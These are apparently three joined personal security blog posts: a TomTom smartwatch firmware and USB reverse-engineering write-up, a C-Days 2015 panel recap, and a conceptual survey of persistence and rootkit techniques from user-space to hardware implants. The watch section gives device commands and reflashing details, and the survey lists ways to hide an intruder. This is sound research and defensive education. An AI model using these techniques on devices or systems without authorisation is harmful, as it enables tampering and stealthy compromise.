  • GPS: If you have a HackRF or similar you could possibly attack the device via its GPS receiver, but I really don’t see the point of it :)
  • Bluetooth: The device has a bluetooth interface that works similarly to USB at the protocol level. From what I read it is possible to interface with in a way similar to USB as long as the device is paired. This could be done using ttblue.
  • USB Interface: This was the preferred attack method. More on this later.

05. Firmware

So step one of hacking any device is trying to get to its software. I did that by looking at how the official TomTom software updates the watch’s Firmware:

TomTom Software

Using Wireshark and forcing an update one can find the location of the firmware files:

TomTom Software

For the observant: yes, this is a regular HTTP page, no SSL. Remember this later.

There are lots of files here, the ones that matter to us are:

  • 0x000000F0 is the main Firmware file;
  • 0x0081000* are language resource files (eng / ger / por / etc.)

There were other files: device configuration files, firmware for the GPS and BLE modules. These last two are unencrypted but were not very interesting.

The larger file (around ~400kb) is 0x000000F0 and looks like the main firmware. Looking at it with binwalk gave us this:

$ binwalk -BEH 0x000000F0

DECIMAL       HEXADECIMAL     HEURISTIC ENTROPY ANALYSIS
--------------------------------------------------------------------------------
1024          0x400           High entropy data, best guess: encrypted, size: 470544, 0 low entropy blocks

binwalk entropy graph

Want further proof that this is encrypted? Check out this comparison of two different firmware versions, using vbindiff:

vbindiff

Note that:

  • Files are different in 16 byte blocks
  • There are blocks that are the equal interleaved with blocks that are different

This means it’s very likely that this is some sort of block cipher in ECB Mode. The most common 16-byte block cipher, by far, is (you guessed it) AES.

Lets take a step back for now regarding firmware analysis. Let’s look at what we can learn about the device’s hardware.

06. Hardware

What can we learn about the watch hardware without opening it? This is probably old news to veteran reverse engineers, but here goes: pretty much any RF emitting device sold in the United States is tested by the FCC, that eventually publishes its report containing all sorts of juicy information and photos.

There’s a nice search engine for FCC report data (the official site seems purposefully obtuse) by Dominic Spill, you just need the FCC ID (S4L8RS00 in our case). Here is the obligatory full frontal nude photo of our device, courtesy of the FCC:

vbindiff

The big black chips are:

  • Micron N25Q032A13ESC40F: This is a serial EEPROM with 4MB capacity. It’s the “hard-drive” of the device, where the exercise files are stored, among other things.
  • Texas Instruments CC2541: This is the Bluetooth chip.
  • Atmel ATSAM4S8C: Micro-Controller Unit (MCU). This is the “brain” of the device, and contains:
    - A Cortex-M4 ARM core
    - 512 kb of Flash memory the firmware and bootloader reside
    - 128 kb of RAM memory

The GPS chip is soldered on a daughterboard near the D-PAD.

This information will be useful later on. Since now we have a good enough picture of the device’s innards, let’s move on.

A sidenote, that PDF Datasheet of the Atmel I linked up there was my bedside reading for a long time. In my foray as an hardware reverse engineer you really should embrace the datasheet. And this one’s pretty thorough, which was a nice experience. Hooray for Atmel :)

06. USB Communications

I had some work cut out for me in this field. There’s already a nice piece of open source software that does most things the official TomTom Windows software does. You can check it out here: ttwatch.

I looked at the source which is very easy to read. If you compile it with ./configure --with-unsafe you’ll get a few additional nifty command line options. Turns out that a lot of the USB communication with the watch is simply read / write commands to its internal EEPROM.

I did some more investigations regarding USB, and made a crude fork of ttwatch that removes some sanity checks and implements a new tool, ttdiag to send/receive raw packets from/to the device. I also used USBPcap on Windows to record the communication between the device and the TomTom MySports Connect software.

These investigations led me to find a lot of interesting and undocumented USB commands for the device. The USB communication is quite simple, with each command composed by at least the following four bytes:


09 02 01 0E

"09" -> Indicates a command to the watch (preamble)
"02" -> Size of message
"01" -> sequence number. Should increment after each command.
"0E" -> Actual command byte (this one formats the EEPROM)

Some commands have arguments, such as file contents, etc. Since each command is a single byte, it was easy to cycle through all possible commands. The full list is available here. There were some interesting commands, such as a hidden test menu, a command that took “screenshots” of the device and saved them on the EEPROM, etc. Here is the test menu testing the accelerometer sensor:

Accelerometer Test

Most of the commands to/from the watch involve reading / writing to the 4MB EEPROM we saw earlier. ttwatch already does that for us. We can read, write and list files:

root@kali:~/usb# ttwatch -l
0x00000030: 16072
0x00810004: 4198
0x00810005: 4136
0x00810009: 3968
0x0081000b: 3980
0x0081000a: 4152
0x0081000e: 3957
0x0081000f: 4156
0x0081000c: 4003
0x00810002: 4115
[...]

root@kali:~/usb# ttwatch -r 0x00f20000
<?xml version="1.0" encoding="UTF-8"?>
<preferences version="1" modified="seg set 21 13:34:28 2015">
    <ephemerisModified>0</ephemerisModified>
    <SyncTimeToPC>1</SyncTimeToPC>
    <SendAnonymousData>1</SendAnonymousData>
    <WatchWindowMinimized>0</WatchWindowMinimized>
    <watchName>lgrangeia</watchName>
    <ConfigURL>https://mysports.tomtom.com/service/config/config.json</ConfigURL>
    <exporters>
    </exporters>
</preferences>

Turns out that if you write the firmware file you saw earlier from download.tomtom.com, the next time you unplug the watch from USB it will reboot and reflash the file, assuming it is a valid firmware file.

07. To be continued…

This is turning up to be a long post so I won’t keep you longer for today. I will keep my promise and show you how I exploited this watch and extracted / modified its firmware. Next post will be about finding that memory corruption bug and controlling execution.

On Risk Management and Policies, C-Days 2015

Earlier this October I attended C-Days 2015, an annual conference on cyber security, organized by CNCS.

It was a very interesting conference, mostly because it got to gather in the same room some interesting and different people from the information security field, and – a rare thing for a Portuguese infosec conference – did so without almost any vendor talks promoting the next great product/service xyz.

I had the honor of being invited to talk on a panel with the theme “Risk Management & Policies – No shortcuts for security”, alongside Fernando Fevereiro Mendes.

The talk was recorded and is available on Youtube. It’s in portuguese and is a bit long so here are the main topics I talked about:

  • Attacker methodologies are fairly unchanged over the years because defenders are so slow to adapt; how do we close the gap between a successful attack strategy and successful defense strategy?

  • There’s still a gap between “tech geeks” and “strategists” and these two groups snub and devalue each other’s work. This divorce between strategy and operations is one of the biggest setbacks for a good security posture;

  • Security products are a risk in themselves. Here in Portugal we rely more on products than on know-how. Products increase complexity and risk, and are not agile: When a security product reaches maturity required to be effective, attackers have already moved on to the next attack.

  • I basically concluded saying we need more “disrupters” in the infosec field in Portugal. We need to bring the hacker / breaker spirit to big organizations and put them to good use: test security policies by running red team exercises, security audits, phishing campaigns, and try new attack methods. If we snub hackers that want to help organizations we will be blind and unprepared to the real attackers when they hit.

Here is the video in full. I start at around the 17m mark.

I was also present at B-Sides Lisbon earlier this year which was also great, and a bit more comfortable for me, a true “hacker conference”. I hope next year the audience for both these conferences will be pretty much the same. It would be a good sign of maturity for the industry.

IncePCtion - Recap on persistence techniques on modern desktop PCs

After coming back from my first DefCon and having attended several talks that circled around variations of this topic, I realized I needed to write this post in order to consolidate my knowledge on the topic of persistence techniques. Hopefully this will be useful to others.

Modern PC’s are increasingly complex and so are their OS’s. It’s important to understand the abundance of ways an attacker can achieve persistence after compromising a computer.

My objective with this post is to enumerate all the different ways persistence can be achieved after compromising a desktop computer (Windows/Linux/OSX) in a generic form. Instead of repeating the work of others, I’ll refer to the more technical articles as needed.

So without further ado, let’s start the inception process. We’ll start from the surface and will gradually dive deeper and deeper into the system’s “subconscious” states.

1. User-space persistence

It’s the oldest and still the most common form of persistence. On Unix/Linux systems this usually means patching some SUID binary or service. In Windows systems it usually means running a malicious process in the background on system startup. I’d also argue that’s the easiest to detect, but is still extremely effective in most cases.

This is your standard userspace (ring 3) rootkit.

2. Kernel-space persistence

This technique involves loading a kernel module or driver into kernel memory, so that the malicious code runs without most of the OS restrictions. It’s also much harder to detect, because it runs in kernel space. It usually involves patching a kernel function or service.
While harder to detect this, this mechanism still requires the modification of operating system files (a malicious driver, kernel module, etc.).

This is your typical “ring 0” rootkit.

3. Virtual Machine Based Rootkit

This is more commonly known as the Blue Pill attack, made famous by Joanna Rutkowska in 2006. This technique involves using the CPU’s built-in virtualization helpers (AMD-V, Intel’s VT-x) to create a thin hypervisor/VMM that sits between the OS’s and the host machine. Hardware interrupts and nearly any other computer function can be handled by the VMM, so malicious code can be executed this way and hidden from all levels of the OS.

Note that some recent OS’s already use VMM’s natively for compartmentalization. For instance, Windows 10 uses a thin hypervisor to abstract the security module that holds the user’s credentials (LSASS) in a separate VM away from the main OS. This means that not even ring 0 code running in the main OS can access the VM that holds the LSASS process.

This is also called a “ring -1” rootkit.

4. BIOS / UEFI patching

This method involves patching the BIOS firmware in order to achieve persistence. It usually needs another method to interact with the OS, such as malicious userland code that takes advantage of the patched BIOS functions.
Usually the BIOS is write-protected during OS execution and its update process uses signature verifications, but sometimes vulnerabilities are found on that process that allow rogue firmware modifications.

There are several ways of achieving persistence by modifying BIOS code and most of the other low level persistence techniques require this. A simple form of BIOS persistence is the modification of the S3 Boot Scripts table to include malicious code that gets executed when the system resumes from sleep.

My fellow portuguese researcher @osxreverser found an interesting bug on most of Apple’s Macbook laptops that allow patching the firmware from the operating system. This of course should not be possible, but most PC architectures still have insecure or buggy BIOS upgrade paths.

On this topic it is worth mentioning yet another blunder by Lenovo: It was recently discovered that they use a special ACPI table stored in the BIOS called Windows Platform Binary Table to install a persistent “rootkit” on some of their retail machines.

Also make sure to read about the curious case of BadBIOS.

5. GPU / Ethernet / Option ROM patching

The BIOS / UEFI is not the only non-volatile code that is executed each time your computer starts. Every device connected to the PCI bus is handed execution flow by the BIOS on startup. The idea is to load drivers into memory, setup the hardware, PXE boot process, etc. The firmware of these devices can also be patched to achieve persistence.

Notorious examples are GPU rootkits such as jellyfish and Demon, Ethernet firmware rootkits, etc.

6. SMM Rootkits

System Management Mode (or SMM) is a special mode of execution in modern PC’s to handle special hardware functions like power management, system hardware control, or proprietary OEM designed code. Usually, an SMI interrupt is triggered by an hardware function and the CPU enters a special mode of execution. Note that this special SMI interrupt cannot be caught by the operating system. While in this SMM mode a special block of memory (the SMRAM) can be read or written to, remaining protected from the OS. The rootkit works by patching/backdooring the SMI handler that exists in SMRAM.

Make sure to read this paper for more information.

This is also called a “ring -2” rootkit.

7. Active Management Engine Rootkits

Most business PC architectures have a dedicated processor running parallel to the main CPU, to provide administrative functions and special remote access. Most notably, Intel’s vPro architecture has a dedicated (non-IA32) CPU with access to dedicated DRAM and direct access to the network card. The software that runs all this is stored in the BIOS chip and can be modified to achieve persistence.

This is fundamentally different from SMM rootkits because the persistent code is going to run on a physically distinct processor, not on the main CPU.

These slides talk extensively the intel AMT architecture and how to attack it.

Some PC’s also include what’s called a Baseboard Management Controller (BMC) that runs a special protocol (IPMI) designed to remotely manage the system. This is also independent from the main OS and CPU, and could be backdoored to achieve persistence. For more information on BMC and IPMI it is useful to refer to the research done by HD Moore here.

These are also known as “ring -3” rootkits.

8. Peripheral controllers

An elegant form of persistence is patching the firmware of peripherals of the system, such as USB controllers, Hard Drive controllers, keyboard controllers, LTE / 4G cards, etc.

This is a particularly elegant way of persistence because the main CPU and/or BIOS does not have an easy way of verifying the code running on peripheral hardware. Also, most of these peripherals have vulnerable firmware update paths that facilitate backdooring.

There is interesting work published on this topic:

  • LTE / 4G: great presentation on Defcon 23 on patching a LTE module of a PC/Tablet to achieve persistence.
  • BadUSB: Research led by Karsten Nohl that uses “evil” USB peripherals to flash and persist on USB controller firmware.
  • Hard Drive Controllers: The recent paper on the Equation Group by Kaspersky details the backdooring of Hard Drive controller chips. There is also a public presentation on this topic made on 2013 and linked here.

9. CPU Microcode

The Intel CPU has software microcode that contains the low level code that dictates how it executes its opcodes. This microcode can be updated from the original version that was “burned” inside the main CPU. Usually these microcode updates are done by the firmware because they are not persistent (must be reapplied on system reboot), but they can be done also by the operating system.

To prevent tampering, Intel has verifications in place that prevent the loading of malicious microcode. The Intel microcode update process has been thoroughly investigated by Ben Hawkes in this great paper.

As far as I know no similar research exists for the AMD microcode update process.

In case an attacker could modify the CPU’s microcode, persistence could be achieved by implementing a special CPU opcode or patching an existing one that removed security restrictions for a given OS process if the opcode is called with the correct parameters.

It’s a theoretic possibility that Intel, AMD or a state sponsored actor such as the NSA could have such backdoor in place.

10. Hardware based implants

Finally a passing reference to the lowest possible form of backdooring: having access to hardware and modifying it. The leaked NSA files show that they implanted systems by inserting devices on them, such as JTAG implants, console ports, Ethernet ports. Etc.

This remains outside of the realm of possibility for most attackers but is extremely hard to detect if done well.

Conclusion

After putting all this together it seems amazing that there are so many mechanisms to hide the presence of an attacker inside a modern PC.

I’ve tried to make this post as complete as possible, but it’s possible that I missed something. DM or mention me at @lgrangeia with links to other work and / or persistence mechanisms and I’ll update this post accordingly.